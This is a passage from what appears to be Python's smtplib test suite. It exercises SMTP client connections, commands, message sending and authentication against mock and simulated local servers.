smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
smtplib.SMTP(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
